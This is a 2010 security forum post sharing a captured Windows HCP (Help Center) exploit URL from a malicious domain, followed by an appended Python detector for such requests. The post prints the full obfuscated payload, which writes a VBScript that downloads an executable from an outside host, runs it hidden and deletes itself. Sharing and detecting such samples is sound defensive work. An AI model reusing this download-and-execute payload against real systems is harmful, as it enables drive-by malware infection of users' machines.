Author Topic: Malicious domain using Windows HCP Exploit  (Read 6765 times)


September 30, 2010, 09:20:51 pm

jepearsall

Found this one on msnbc.com - http://predisruption.com/sell/exe.php-exp,
detected as Mal/Psyme-A by IronPort.

Full HCP script:
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>Run('cmd /c echo FileName ! @}TEMP}/file.exe@>>}TEMP}/go.vbs]]echo url!@http://predisruption.com/sell/exe.php-exp!HCP]key!78872c960b0135f567e2b3c1c7c3bc55@ >>}TEMP}/go.vbs]]echo Set objHTTP ! CreateObject(@MSXML2.XMLHTTP@)>>}TEMP}/go.vbs]]echo Call objHTTP.Open(@GET@, url, False)>>}TEMP}/go.vbs]]echo objHTTP.Send>>}TEMP}/go.vbs]]echo set oStream ! createobject(@Adodb.Stream@)>>}TEMP}/go.vbs]]echo Const adTypeBinary ! 1 >>}TEMP}/go.vbs]]echo Const adSaveCreateOverWrite ! 2 >>}TEMP}/go.vbs]]echo Const adSaveCreateNotExist ! 1  >>}TEMP}/go.vbs]]echo oStream.type ! adTypeBinary>>}TEMP}/go.vbs]]echo oStream.open>>}TEMP}/go.vbs]]echo oStream.write objHTTP.responseBody>>}TEMP}/go.vbs]]echo oStream.savetofile FileName, adSaveCreateNotExist>>}TEMP}/go.vbs]]echo oStream.close>>}TEMP}/go.vbs]]echo set oStream ! nothing>>}TEMP}/go.vbs]]echo Set xml ! Nothing>>}TEMP}/go.vbs]]echo Set WshShell ! CreateObject(@WScript.Shell@)>>}TEMP}/go.vbs]]echo WshShell.Run FileName, 0, True>>}TEMP}/go.vbs]]echo Set FSO ! CreateObject(@Scripting.FileSystemObject@)>>}TEMP}/go.vbs]]echo FSO.DeleteFile @}TEMP}/go.vbs@ >>}TEMP}/go.vbs|cscript }TEMP}/go.vbs>nul'.replace(/!/g, String.fromCharCode(61)).replace(/@/g, String.fromCharCode(34)).replace(/]/g, String.fromCharCode(38)).replace(/{/g, String.fromCharCode(63)).replace(/}/g, String.fromCharCode(37)).replace(/-/g, String.fromCharCode(63)));</script>
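A small detection helper for the request pattern shown in the post above, added here as an example and not part of the original post. The sample request strings are constructed, and the indicator names and the threshold of eight consecutive "%A%" escapes are my own assumptions, not values from the post:

```python
import re
from urllib.parse import unquote

# Indicators taken from the sample above: an hcp:// search URL whose "topic"
# parameter carries a long run of invalid "%A%" escapes, a "..%5C" traversal
# out of system/sysinfo, and an injected <script> tag. Constructed test lines.
SAMPLE_REQUESTS = [
    "hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm"
    + "%A%" * 40
    + "..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>Run('cmd /c ...')</script>",
    "hcp://services/search?query=printer&topic=hcp://system/sysinfo/sysinfomain.htm",
    "http://example.com/help?topic=network",
]

INDICATORS = {
    "hcp_scheme": re.compile(r"^hcp://", re.I),
    # assumed threshold: eight or more back-to-back invalid escapes
    "bad_escape_run": re.compile(r"(?:%A%){8,}", re.I),
    # two or more "../" or "..\" steps, encoded or not
    "traversal": re.compile(r"(?:\.\.(?:%5C|\\|%2F|/)){2,}", re.I),
    "script_tag": re.compile(r"<script", re.I),
}


def score_hcp_request(url):
    """Return the names of the indicators that match `url`.

    Both the raw string and a percent-decoded copy are checked, since the
    traversal and the script tag may be hidden behind URL encoding.
    """
    candidates = [url, unquote(url)]
    return [name for name, pat in INDICATORS.items()
            if any(pat.search(c) for c in candidates)]


def is_suspicious(url):
    """Flag an hcp:// request that also shows traversal, injection or padding."""
    hits = score_hcp_request(url)
    return "hcp_scheme" in hits and any(
        h in hits for h in ("traversal", "script_tag", "bad_escape_run"))


if __name__ == "__main__":
    for u in SAMPLE_REQUESTS:
        print(is_suspicious(u), score_hcp_request(u), u[:60])
```

A benign hcp:// help request (second sample) matches only the scheme indicator and is not flagged, so the rule keys on the combination rather than on the scheme alone.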